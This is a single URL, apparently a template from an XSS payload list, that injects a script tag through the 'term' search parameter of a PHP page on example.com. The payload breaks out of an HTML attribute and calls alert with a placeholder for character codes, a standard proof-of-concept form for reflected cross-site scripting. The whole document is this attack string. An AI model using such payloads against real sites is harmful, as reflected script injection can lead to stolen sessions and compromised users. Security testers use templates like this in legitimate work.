http://www.example.com/index.php?term="><script>alert(String.fromCharCode(Your charcode here))<%2Fscript>&sm=Search&source=1&req=search